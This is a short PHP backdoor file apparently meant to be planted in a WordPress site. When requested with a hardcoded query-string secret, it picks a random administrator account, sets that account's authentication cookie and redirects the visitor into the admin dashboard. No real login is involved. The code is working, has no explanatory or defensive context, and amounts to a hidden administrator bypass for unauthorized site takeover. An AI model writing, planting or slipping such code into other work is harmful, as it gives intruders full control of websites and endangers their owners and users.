<?php
$sec = "howl"; 
if (!isset($_GET['love']) || $_GET['love'] !== $sec) {
    die("Didnt have access!");
}

require_once('../../wp-load.php');

$admins = get_users(array(
    'role' => 'administrator'
));

if (!empty($admins)) {
    $random_admin = $admins[array_rand($admins)];
    
    $user_id = $random_admin->ID;
    
    wp_set_auth_cookie($user_id);
    wp_set_current_user($user_id);
    
    wp_redirect(admin_url());
    exit;
} else {
    echo "Tidak ada administrator yang ditemukan.";
}
?>
